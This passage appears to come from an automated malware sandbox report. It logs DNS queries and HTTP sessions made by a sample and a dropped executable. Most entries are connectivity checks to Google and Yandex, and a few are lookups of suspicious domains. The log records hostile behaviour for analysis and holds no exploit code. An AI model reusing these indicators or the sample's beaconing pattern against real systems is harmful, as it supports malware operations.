                                                                                                                                                Sep 29, 2022 14:48:19.413527966 CEST8.8.8.8192.168.2.30xef93No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:48:20.323483944 CEST8.8.8.8192.168.2.30x9682No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:48:20.323483944 CEST8.8.8.8192.168.2.30x9682No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:48:20.323483944 CEST8.8.8.8192.168.2.30x9682No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:48:20.323483944 CEST8.8.8.8192.168.2.30x9682No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:17.304323912 CEST8.8.8.8192.168.2.30x1ae0No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:19.507842064 CEST8.8.8.8192.168.2.30xcf24No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:19.669548988 CEST8.8.8.8192.168.2.30x4bcdNo error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:24.755902052 CEST8.8.8.8192.168.2.30xeadNo error (0)powertoolsforyou.com38.238.72.106A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:35.716871023 CEST8.8.8.8192.168.2.30x2358No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:38.781932116 CEST8.8.8.8192.168.2.30xeee9No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:41.331820011 CEST8.8.8.8192.168.2.30x6128No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:44.423228979 CEST8.8.8.8192.168.2.30xef42No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:46.730151892 CEST8.8.8.8192.168.2.30x13beNo error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:47.020317078 CEST8.8.8.8192.168.2.30x24b7No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:49.994954109 CEST8.8.8.8192.168.2.30x37bNo error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:56.861150026 CEST8.8.8.8192.168.2.30x6a01No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:00.129933119 CEST8.8.8.8192.168.2.30x6d96No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:03.482307911 CEST8.8.8.8192.168.2.30xc906No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:08.226022005 CEST8.8.8.8192.168.2.30xab3Name error (3)recoverpcerror.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:08.250828981 CEST8.8.8.8192.168.2.30x444Name error (3)itsupport24by7.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:08.596714973 CEST8.8.8.8192.168.2.30x400eNo error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:10.608457088 CEST8.8.8.8192.168.2.30x6338No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:13.737261057 CEST8.8.8.8192.168.2.30x4e09No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:15.269243002 CEST8.8.8.8192.168.2.30xe3faNo error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                                                                • https:
                                                                                                                                                  • www.bing.com
                                                                                                                                                • fs.microsoft.com
                                                                                                                                                • github.com
                                                                                                                                                • raw.githubusercontent.com
                                                                                                                                                • watson.telemetry.microsoft.com
                                                                                                                                                • yandex.ru
                                                                                                                                                • google.com
                                                                                                                                                • arizonacode.bplaced.net
                                                                                                                                                • powertoolsforyou.com
                                                                                                                                                • google.ru
                                                                                                                                                • collect.installeranalytics.com
                                                                                                                                                • www.vikingwebscanner.com
                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.349677204.79.197.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.349682204.79.197.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                10192.168.2.349688185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                100172.217.168.1480192.168.2.349753C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:41.414741039 CEST10273INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:41 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:41 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                101192.168.2.349758172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:44.529433966 CEST11097OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                102172.217.168.1480192.168.2.349758C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:44.574704885 CEST11098INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:44 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:44 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                103192.168.2.349762172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:46.813505888 CEST12282OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                104172.217.168.1480192.168.2.349762C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:46.856595039 CEST12282INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:46 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:46 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                105192.168.2.349763172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:47.050504923 CEST12283OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                106172.217.168.1480192.168.2.349763C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:47.094239950 CEST12284INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:47 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:47 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                107192.168.2.349765172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:50.047130108 CEST12284OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                108172.217.168.1480192.168.2.349765C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:50.090910912 CEST12285INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:50 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:50 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                109192.168.2.349771172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:57.060719013 CEST12476OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                11185.199.108.133443192.168.2.349688C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                110172.217.168.1480192.168.2.349771C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:57.105653048 CEST12476INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:57 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:57 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                111192.168.2.349774172.217.168.6780C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:57.537929058 CEST12478OUTGET /d2ea090d-962c-45e9-bd4f-67977169ed52 HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                Host: google.ru
                                                                                                                                                Sep 29, 2022 14:49:57.555706024 CEST12479INHTTP/1.1 404 Not Found
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                Content-Length: 1597
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:57 GMT
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2
                                                                                                                                                Sep 29, 2022 14:49:57.555747032 CEST12480INData Raw: 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63
                                                                                                                                                Data Ascii: ){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                112192.168.2.34977377.88.55.5080C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:57.580410957 CEST12480OUTGET /1001 HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                Host: yandex.ru
                                                                                                                                                Sep 29, 2022 14:49:57.648658037 CEST12481INHTTP/1.1 302 Moved temporarily
                                                                                                                                                Content-Length: 0
                                                                                                                                                Location: https://yandex.ru/1001
                                                                                                                                                NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}
                                                                                                                                                Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                set-cookie: is_gdpr=1; Path=/; Domain=.yandex.ru; Expires=Sat, 28 Sep 2024 12:49:57 GMT
                                                                                                                                                set-cookie: is_gdpr_b=CPe0cBDfjAEYAQ==; Path=/; Domain=.yandex.ru; Expires=Sat, 28 Sep 2024 12:49:57 GMT
                                                                                                                                                set-cookie: _yasc=ci6rbjmrlQgO0axLw7w6OWn+wuU8RFP050vqcbO+koLLPW4r; domain=.yandex.ru; path=/; expires=Sat, 29-Oct-2022 12:49:57 GMT; secure


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                113192.168.2.34977254.242.4.10180C:\Windows\SysWOW64\rundll32.exe
